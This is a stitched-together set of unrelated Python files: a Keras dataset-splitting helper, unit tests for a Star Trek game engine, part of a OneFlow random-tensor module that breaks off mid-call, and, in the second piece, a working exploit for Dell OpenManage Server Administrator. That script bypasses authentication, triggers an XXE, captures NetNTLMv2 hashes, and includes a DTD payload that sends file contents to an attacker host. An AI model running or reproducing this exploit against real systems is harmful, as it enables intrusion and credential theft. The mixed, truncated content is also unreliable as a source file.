valid_files = iter_valid_files(directory, follow_links, formats)
labels = []
filenames = []
for root, fname in valid_files:
labels.append(class_indices[dirname])
absolute_path = tf.io.gfile.join(root, fname)
relative_path = tf.io.gfile.join(
dirname, os.path.relpath(absolute_path, directory)
)
filenames.append(relative_path)
return filenames, labels
def get_training_or_validation_split(samples, labels, validation_split, subset):
"""Potentially restict samples & labels to a training or validation split.
Args:
samples: List of elements.
labels: List of corresponding labels.
validation_split: Float, fraction of data to reserve for validation.
subset: Subset of the data to return.
Either "training", "validation", or None. If None, we return all of the
data.
Returns:
tuple (samples, labels), potentially restricted to the specified subset.
"""
if not validation_split:
return samples, labels
num_val_samples = int(validation_split * len(samples))
if subset == "training":
print(f"Using {len(samples) - num_val_samples} files for training.")
samples = samples[:-num_val_samples]
labels = labels[:-num_val_samples]
elif subset == "validation":
print(f"Using {num_val_samples} files for validation.")
samples = samples[-num_val_samples:]
labels = labels[-num_val_samples:]
else:
raise ValueError(
'`subset` must be either "training" '
f'or "validation", received: {subset}'
)
return samples, labels
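# Worked example (synthetic lists, not part of the original module): with
# `validation_split=0.2`, the last 2 of 10 samples are reserved for validation
# and the first 8 are used for training.
def _example_training_split():
    samples = [f"sample_{i}" for i in range(10)]
    labels = list(range(10))
    train_samples, train_labels = get_training_or_validation_split(
        samples, labels, validation_split=0.2, subset="training"
    )
    return train_samples, train_labels  # samples[:8], labels[:8]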
def labels_to_dataset(labels, label_mode, num_classes):
"""Create a tf.data.Dataset from the list/tuple of labels.
Args:
labels: list/tuple of labels to be converted into a tf.data.Dataset.
label_mode: String describing the encoding of `labels`. Options are:
- 'binary' indicates that the labels (there can be only 2) are encoded as
`float32` scalars with values 0 or 1 (e.g. for `binary_crossentropy`).
- 'categorical' means that the labels are mapped into a categorical
vector. (e.g. for `categorical_crossentropy` loss).
num_classes: number of classes of labels.
Returns:
A `Dataset` instance.
"""
label_ds = tf.data.Dataset.from_tensor_slices(labels)
if label_mode == "binary":
label_ds = label_ds.map(
lambda x: tf.expand_dims(tf.cast(x, "float32"), axis=-1),
num_parallel_calls=tf.data.AUTOTUNE,
)
elif label_mode == "categorical":
label_ds = label_ds.map(
lambda x: tf.one_hot(x, num_classes),
num_parallel_calls=tf.data.AUTOTUNE,
)
return label_ds
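# Usage sketch (toy labels, not part of the original module): encode three
# integer class labels as one-hot vectors suitable for a
# `categorical_crossentropy` loss.
def _example_labels_to_dataset():
    label_ds = labels_to_dataset([0, 2, 1], label_mode="categorical", num_classes=3)
    # Yields float one-hot vectors, e.g. [1., 0., 0.] for label 0.
    return label_ds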
def check_validation_split_arg(validation_split, subset, shuffle, seed):
"""Raise errors in case of invalid argument values.
Args:
validation_split: float between 0 and 1, fraction of data to reserve for
validation.
subset: One of "training", "validation" or "both". Only used if
`validation_split` is set.
shuffle: Whether to shuffle the data. Either True or False.
seed: random seed for shuffling and transformations.
"""
if validation_split and not 0 < validation_split < 1:
raise ValueError(
"`validation_split` must be between 0 and 1, "
f"received: {validation_split}"
)
if (validation_split or subset) and not (validation_split and subset):
raise ValueError(
"If `subset` is set, `validation_split` must be set, and inversely."
)
if subset not in ("training", "validation", "both", None):
raise ValueError(
'`subset` must be either "training", '
f'"validation" or "both", received: {subset}'
)
if validation_split and shuffle and seed is None:
raise ValueError(
"If using `validation_split` and shuffling the data, you must "
"provide a `seed` argument, to make sure that there is no "
"overlap between the training and validation subset."
)
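# Usage sketch (illustrative values, not part of the original module): validate a
# typical training/validation configuration before building the datasets; an
# invalid combination raises a `ValueError` instead.
def _example_check_split_args():
    check_validation_split_arg(
        validation_split=0.2, subset="training", shuffle=True, seed=42
    )
    # The same call with `seed=None` would raise, because shuffled splits need a
    # seed to keep the training and validation subsets disjoint.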
|
#This is just a Python version of the https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
#You need to have openssl installed
from xml.sax.saxutils import escape
import BaseHTTPServer
import requests
import thread
import ssl
import sys
import re
import os
import urllib3
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
if len(sys.argv) < 3:
    print 'Usage: python xxe_openmanage.py <yourIP> <targetIP>:<targetPort> http://yourip:8080/some.dtd'
    print 'Get a NetNTLMv2 hash: python xxe_openmanage.py <yourIP> <targetIP>:<targetPort> file://\\yourip'
exit()
#The XML used to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(s):
myIP = sys.argv[1]
XXEUrl = sys.argv[3]
data = ''
content_len = int(s.headers.getheader('content-length', 0))
post_body = s.rfile.read(content_len)
s.send_response(200)
s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
s.end_headers()
if "__00omacmd=getuserrightsonly" in post_body:
data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
if "__00omacmd=getaboutinfo " in post_body:
data = escape("<ProductVersion>6.0.3</ProductVersion>")
if "__00omacmd=getcmdlogcontent" in post_body:
data = escape('''<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE bogus [ <!ENTITY % dtd SYSTEM "'''+XXEUrl+'''"> %dtd;]]><bogus><blah /></bogus>''')
        #Payload for the DTD if you use it
#<!ENTITY % all "<!ENTITY % send SYSTEM 'http://YOURIP:8080/xxe?result=%file;'>"> %all;
if data:
requid = re.findall('>uuid:(.*?)<',post_body)[0]
s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
<s:Header>
<wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
<wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
<wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
</s:Header>
<s:Body>
<n1:SendCmd_OUTPUT>
<n1:ResultCode>0</n1:ResultCode>
<n1:ReturnValue>'''+data+'''</n1:ReturnValue>
</n1:SendCmd_OUTPUT>
</s:Body>
</s:Envelope>''')
else:
s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')
def log_message(self, format, *args):
return
createdCert = False
if not os.path.isfile('./server.pem'):
    print '[-] No server.pem certificate file found. Generating one...'
os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
createdCert = True
def startServer():
server_class = BaseHTTPServer.HTTPServer
    httpd = server_class(('0.0.0.0', 443), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
thread.start_new_thread(startServer,())
myIP = sys.argv[1]
target = sys.argv[2]
def bypassAuth():
values = {}
url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
data = {"manuallogin": "true", "targetmachine": myIP, "user": "XXE", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
r = requests.post(url, data=data, verify=False, allow_redirects=False)
cookieheader = r.headers['Set-Cookie']
sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
pathid = re.findall('Path=/(.*?);',cookieheader)
values['sessionid'] = sessionid[0]
values['pathid'] = pathid[0]
return values
ids = bypassAuth()
sessionid = ids['sessionid']
pathid = ids['pathid']
print "Session: "+sessionid
print "VID: "+pathid
def triggerXXE(target,sessid,pathid):
url = "https://{}/{}/DataArea?plugin=com.dell.oma.webplugins.CmdLogWebPlugin&vid={}".format(target,pathid,pathid)
cookies = {"JSESSIONID": sessid}
r = requests.get(url, cookies=cookies, verify=False)
#print r.content
print 'Triggering XXE'
triggerXXE(target,sessionid,pathid)
|
from typing import Dict
from typing import NewType
from typing import cast
from logging import Logger
from logging import getLogger
from math import degrees
from pytrek.engine.Computer import Computer
from pytrek.engine.Direction import Direction
from pytrek.engine.DirectionData import DirectionData
from pytrek.engine.PlayerType import PlayerType
from pytrek.engine.ShieldHitData import ShieldHitData
from pytrek.engine.GameEngine import GameEngine
from pytrek.engine.devices.DeviceStatus import DeviceStatus
from pytrek.engine.devices.DeviceType import DeviceType
from pytrek.engine.devices.Devices import Devices
from pytrek.model.Coordinates import Coordinates
from pytrek.settings.GameSettings import GameSettings
from pytrek.settings.SettingsCommon import SettingsCommon
from pytrek.GameState import GameState
from unittest import TestSuite
from unittest import main as unitTestMain
from tests.TestBase import TestBase
TestedDirections = NewType('TestedDirections', Dict[Direction, bool])
class TestGameEngine(TestBase):
"""
"""
clsLogger: Logger = cast(Logger, None)
@classmethod
def setUpClass(cls):
TestBase.setUpLogging()
TestGameEngine.clsLogger = getLogger(__name__)
SettingsCommon.determineSettingsLocation()
def setUp(self):
self.logger: Logger = TestGameEngine.clsLogger
self._gameSettings: GameSettings = GameSettings()
self._gameEngine: GameEngine = GameEngine()
self._gameState: GameState = GameState()
self._computer: Computer = Computer()
self._devices: Devices = Devices()
def tearDown(self):
pass
def testComputeHitValueOnKlingon(self):
testKlingonPower: float = 480.0
enterprisePosition: Coordinates = Coordinates(x=0, y=0)
klingonPosition: Coordinates = Coordinates(x=0, y=9)
for x in range(10):
kHit: float = self._gameEngine.computeHitValueOnKlingon(enterprisePosition=enterprisePosition,
klingonPosition=klingonPosition,
klingonPower=testKlingonPower)
self.logger.info(f'Iteration: {x} - kHit={kHit:.2f}')
if kHit <= testKlingonPower:
self.assertLess(kHit, testKlingonPower, 'Single torpedo can almost never kill a Klingon')
else:
self.logger.info(f'Iteration: {x} killed a Klingon')
def testComputeCourseStraightWest(self):
end: Coordinates = Coordinates(x=0, y=5)
start: Coordinates = Coordinates(x=9, y=5)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
        self.assertEqual(180, angle, 'Did calculation change?')
self.logger.info(f'{course=} {angle=}')
def testComputeCourseDown(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=0, y=9)
course: float = self._gameEngine._computeCourse(start=start, end=end)
downAngle: float = degrees(course)
self.assertEqual(90, downAngle, 'Hmm, messed up code')
self.logger.info(f'{course=} {downAngle=}')
def testComputeCourseUp(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=0, y=9)
backwardCourse: float = self._gameEngine._computeCourse(start=end, end=start)
backAngle: float = degrees(backwardCourse)
self.assertEqual(-90, backAngle, 'Who changed my code')
self.logger.info(f'{backwardCourse=} {backAngle=}')
def testComputeCourseDiagonal(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=9, y=9)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
self.assertEqual(45, angle, 'Busted code')
self.logger.info(f'{course=} {angle=}')
def testComputeCourseBackDiagonal(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=9, y=9)
backwardCourse: float = self._gameEngine._computeCourse(start=end, end=start)
backAngle: float = degrees(backwardCourse)
self.assertEqual(-135, backAngle, 'Who changed my code')
self.logger.info(f'{backwardCourse=}, {backAngle=}')
def testComputeCourseStraightEast(self):
start: Coordinates = Coordinates(x=0, y=5)
end: Coordinates = Coordinates(x=9, y=5)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
        self.assertEqual(0, angle, 'Did calculation change?')
self.logger.info(f'{course=} {angle=}')
def testUpdateTimeAfterWarpTravelShortWarpSpeedLow(self):
previousStarDate: float = self._gameState.starDate
previousRemainGameTime: float = self._gameState.remainingGameTime
travelDistance: float = 1.0
warpFactor: float = 1.0
self._gameEngine.updateTimeAfterWarpTravel(travelDistance=travelDistance, warpFactor=warpFactor)
updatedOpTime: float = self._gameState.opTime
expectedOpTime: float = 10.0
self.assertEqual(expectedOpTime, updatedOpTime, 'Operation Time incorrectly calculated')
expectedStarDate: float = previousStarDate + updatedOpTime
actualStarDate: float = self._gameState.starDate
self.assertEqual(expectedStarDate, actualStarDate, 'StarDate was inappropriately updated')
expectedRemainingGameTime: float = previousRemainGameTime - updatedOpTime
actualRemainingGameTime: float = self._gameState.remainingGameTime
self.assertEqual(expectedRemainingGameTime, actualRemainingGameTime, 'Remaining Game Time was inappropriately updated')
def testUpdateTimeAfterWarpTravelLong(self):
previousStarDate: float = self._gameState.starDate
previousRemainGameTime: float = self._gameState.remainingGameTime
travelDistance: float = 9.0
warpFactor: float = 9.0
self._gameEngine.updateTimeAfterWarpTravel(travelDistance=travelDistance, warpFactor=warpFactor)
updatedOpTime: float = self._gameState.opTime
expectedOpTime: float = 1.11
self.assertAlmostEqual(expectedOpTime, updatedOpTime, 2, 'Operation Time incorrectly calculated')
expectedStarDate: float = previousStarDate + updatedOpTime
actualStarDate: float = self._gameState.starDate
self.assertEqual(expectedStarDate, actualStarDate, 'StarDate was inappropriately updated')
expectedRemainingGameTime: float = previousRemainGameTime - updatedOpTime
actualRemainingGameTime: float = self._gameState.remainingGameTime
self.assertEqual(expectedRemainingGameTime, actualRemainingGameTime, 'Remaining Game Time was inappropriately updated')
def testShipAdjacentToBaseNorth(self):
"""
In these tests the base is always at sector coordinates 5,5
"""
shipPosition: Coordinates = Coordinates(x=4, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly north')
def testShipAdjacentToBaseSouth(self):
shipPosition: Coordinates = Coordinates(x=5, y=5)
basePosition: Coordinates = Coordinates(x=6, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly south')
def testShipAdjacentToBaseEast(self):
shipPosition: Coordinates = Coordinates(x=6, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly east')
def testShipAdjacentToBaseWest(self):
shipPosition: Coordinates = Coordinates(x=4, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly west')
def testShipAdjacentToBaseNorthEast(self):
shipPosition: Coordinates = Coordinates(x=4, y=6)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly NorthEast')
def testShipAdjacentToBaseNorthWest(self):
shipPosition: Coordinates = Coordinates(x=4, y=4)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly NorthWest')
def testShipAdjacentToBaseSouthEast(self):
shipPosition: Coordinates = Coordinates(x=6, y=6)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly SouthEast')
def testShipAdjacentToBaseSouthWest(self):
shipPosition: Coordinates = Coordinates(x=6, y=4)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly SouthWest')
def testShipAdjacentToBaseNotAdjacentClose(self):
shipPosition: Coordinates = Coordinates(x=7, y=7)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertFalse(adjacent, 'We are pretty close but not adjacent')
def testShipAdjacentToBaseNotAdjacentVeryFar(self):
shipPosition: Coordinates = Coordinates(x=9, y=9)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertFalse(adjacent, 'We are very far and not adjacent')
def testDoPhasersMaxDistance(self):
shooterCoordinates: Coordinates = Coordinates(0, 0)
targetCoordinates: Coordinates = Coordinates(9, 9)
expectedPhaserHit: float = 218.6
self._runPhaserTest(shooterCoordinates=shooterCoordinates, targetCoordinates=targetCoordinates, expectedPhaserHit=expectedPhaserHit)
def testDoPhasersShortDistance(self):
shooterCoordinates: Coordinates = Coordinates(0, 4)
targetCoordinates: Coordinates = Coordinates(4, 4)
expectedPhaserHit: float = 239.68
self._runPhaserTest(shooterCoordinates=shooterCoordinates, targetCoordinates=targetCoordinates, expectedPhaserHit=expectedPhaserHit)
def testHitThem(self):
shooterCoordinates: Coordinates = Coordinates(0, 0)
targetCoordinates: Coordinates = Coordinates(9, 9)
distance: float = self._computer.computeQuadrantDistance(startSector=shooterCoordinates, endSector=targetCoordinates)
enemyPower: float = 500.0
powerDrain: float = self._gameEngine.hitThem(distance=distance, hit=218.6, enemyPower=enemyPower)
minPowerDrain: float = 329
self.assertGreater(powerDrain, minPowerDrain, 'Did not calculate the minimum power drain')
self.logger.info(f'{powerDrain=}')
def testComputeShieldHitShieldsFull(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 1000, 'Shields should absorb all')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 0, 'Nothing should pass through')
def testComputeShieldHitShieldsHalf(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields // 2)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 500, 'Shields should absorb half')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 500, 'Half should pass through')
def testComputeShieldHitShieldsQuarter(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields // 4)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 250, 'Shields should absorb 1/4')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 750, '3/4 should pass through')
def testComputeShieldHitShieldsDown(self):
saveShieldStatus: DeviceStatus = self._devices.getDeviceStatus(DeviceType.Shields)
self._devices.setDeviceStatus(DeviceType.Shields, DeviceStatus.Down)
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 0, 'Shields are down everything passes through')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 1000, 'We should get whacked')
self._devices.setDeviceStatus(DeviceType.Shields, saveShieldStatus)
def testComputeHit(self):
for pType in PlayerType:
computedHit = self._commonComputeHit(playerType=pType)
self.assertFalse(computedHit == 0.0, "Can't have non-hit")
self.logger.info(f"computedHit for {pType.__repr__()}: {computedHit}")
def testComputeEnergyWhenBlockedNominal(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=5, y=5)
expectedStopEnergy: float = 76.57
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyWhenBlockedMaximum(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=8, y=8)
expectedStopEnergy: float = 118.99
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Maximum case does not compute')
def testComputeEnergyWhenBlockedMinimum(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=1, y=2)
expectedStopEnergy: float = 30.0
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Minimum test does not compute')
def testComputeCloseCoordinates(self):
"""
Loop until all directions tested
"""
testedDirections: TestedDirections = self._initDirectionTest()
targetCoordinates: Coordinates = Coordinates(x=5, y=5)
while self._areAllDirectionsValidated(testedDirections=testedDirections) is False:
directionData: DirectionData = self._gameEngine.computeCloseCoordinates(targetCoordinates=targetCoordinates)
testedDirections[directionData.direction] = True
self._validateReturn(targetCoordinates=targetCoordinates, directionData=directionData)
self.logger.debug(f'All directions tested: {testedDirections=}')
def testComputeEnergyForWarpTravelMediumDistanceMediumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=5.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 255.05
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMediumDistanceMaximumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=9.9)
self.logger.info(f'{energy=}')
expectedEnergy: float = 1945.65
decimalPlace: int = 2
        self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Medium distance at maximum warp does not compute')
def testComputeEnergyForWarpTravelMediumDistanceMinimumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=1.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 7.05
decimalPlace: int = 2
        self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Medium distance at minimum warp does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMediumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=5.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 262.05
decimalPlace: int = 2
        self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Maximum distance at medium warp does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMaximumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=9.9)
self.logger.info(f'{energy=}')
expectedEnergy: float = 1952.65
decimalPlace: int = 2
        self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Maximum distance at maximum warp does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMinimumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=1.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 14.05
decimalPlace: int = 2
        self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Maximum distance at minimum warp does not compute')
def _commonComputeHit(self, playerType: PlayerType) -> float:
self._gameState.playerType = playerType
shooterPosition: Coordinates = Coordinates(x=7, y=7)
targetPosition: Coordinates = Coordinates(x=3, y=7)
klingonPower: float = 348.0
computedHit = self._gameEngine.computeHit(shooterPosition=shooterPosition,
targetPosition=targetPosition,
klingonPower=klingonPower)
return computedHit
def _initDirectionTest(self) -> TestedDirections:
testedDirections: TestedDirections = TestedDirections({})
for direction in Direction:
testedDirections[direction] = False
return testedDirections
def _validateReturn(self, targetCoordinates: Coordinates, directionData: DirectionData):
direction: Direction = directionData.direction
coordinates: Coordinates = directionData.coordinates
targetX: int = targetCoordinates.x
targetY: int = targetCoordinates.y
newX: int = coordinates.x
newY: int = coordinates.y
if direction == Direction.North:
self.assertEqual(newX, targetX, 'X should be unchanged for North')
self.assertEqual(newY, targetY - 1, 'Y should be less one for North')
elif direction == Direction.South:
self.assertEqual(newX, targetX, 'X should be unchanged for South')
self.assertEqual(newY, targetY + 1, 'Y should be one more for South')
elif direction == Direction.East:
self.assertEqual(newX, targetX + 1, 'X should be one more for East')
self.assertEqual(newY, targetY, 'Y should be unchanged for East')
elif direction == Direction.West:
self.assertEqual(newX, targetX - 1, 'X should be one less for West')
self.assertEqual(newY, targetY, 'Y should be unchanged for West')
elif direction == Direction.NorthEast:
            self.assertEqual(newX, targetX + 1, 'X should be 1 more for NorthEast')
self.assertEqual(newY, targetY - 1, 'Y should be 1 less for NorthEast')
elif direction == Direction.SouthEast:
            self.assertEqual(newX, targetX + 1, 'X should be 1 more for SouthEast')
self.assertEqual(newY, targetY + 1, 'Y should be 1 more for SouthEast')
elif direction == Direction.NorthWest:
            self.assertEqual(newX, targetX - 1, 'X should be 1 less for NorthWest')
self.assertEqual(newY, targetY - 1, 'Y should be 1 less for NorthWest')
elif direction == Direction.SouthWest:
            self.assertEqual(newX, targetX - 1, 'X should be 1 less for SouthWest')
self.assertEqual(newY, targetY + 1, 'Y should be 1 more for SouthWest')
self.logger.info(f'{direction.name} passed')
def _areAllDirectionsValidated(self, testedDirections: TestedDirections) -> bool:
"""
Args:
testedDirections: The tested directions dictionary
        Returns: True only when every direction has been tested; False if any entry is still False
"""
for value in testedDirections.values():
if value is False:
return False
return True
def _runPhaserTest(self, shooterCoordinates: Coordinates, targetCoordinates: Coordinates, expectedPhaserHit: float):
distance: float = self._computer.computeQuadrantDistance(startSector=shooterCoordinates, endSector=targetCoordinates)
enemyPower: float = 500.0
powerAmount: float = 500.0
phaserHit: float = self._gameEngine.doPhasers(distance=distance, enemyPower=enemyPower, powerAmount=powerAmount)
self.assertAlmostEqual(expectedPhaserHit, phaserHit, places=1)
self.logger.info(f'{phaserHit=}')
def suite() -> TestSuite:
"""You need to change the name of the test class here also."""
import unittest
testSuite: TestSuite = TestSuite()
# noinspection PyUnresolvedReferences
testSuite.addTest(unittest.makeSuite(TestGameEngine))
return testSuite
if __name__ == '__main__':
unitTestMain()
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional, Union
import oneflow as flow
from oneflow.nn.module import Module
from oneflow.nn.modules.utils import _single
def _rand_op_common_process(
size, device=None, generator=None, placement=None, sbp=None
):
if isinstance(device, str):
device = flow.device(device)
size = _single(size)
processed_sbp = sbp
if placement is not None:
if isinstance(processed_sbp, flow.sbp.sbp):
processed_sbp = (processed_sbp,)
return size, device, generator, placement, processed_sbp
class Rand(Module):
def __init__(
self,
size,
generator=None,
dtype=None,
layout=None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
def forward(self):
if self.placement is not None:
res = flow._C.rand(
self.size,
placement=self.placement,
sbp=self.sbp,
dtype=self.dtype,
generator=self.generator,
)
else:
res = flow._C.rand(
self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
)
res.requires_grad = self.requires_grad
return res
def rand_op(
*size,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False
):
"""
Returns a tensor filled with random numbers from a uniform distribution on the interval [0, 1)
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.float32``.
layout (optional): The desired layout of returned Tensor.
generator (flow.Generator, optional): a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
        placement (flow.placement, optional): The desired placement of the returned consistent tensor. If None,
            a local tensor is constructed.
        sbp (flow.sbp, optional): The desired sbp of the returned consistent tensor. Its length must match the
            number of placement dimensions.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> x = flow.rand(3,3)
>>> x.shape
oneflow.Size([3, 3])
>>> x.is_consistent
False
>>> placement = flow.placement("cpu", {0: [0]})
>>> sbp = flow.sbp.broadcast
>>> x = flow.rand(3, 3, placement=placement, sbp=sbp)
>>> x.is_consistent
True
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.rand(
size=size,
placement=placement,
sbp=sbp,
dtype=dtype,
generator=generator,
requires_grad=requires_grad,
)
else:
return flow._C.rand(
size=size,
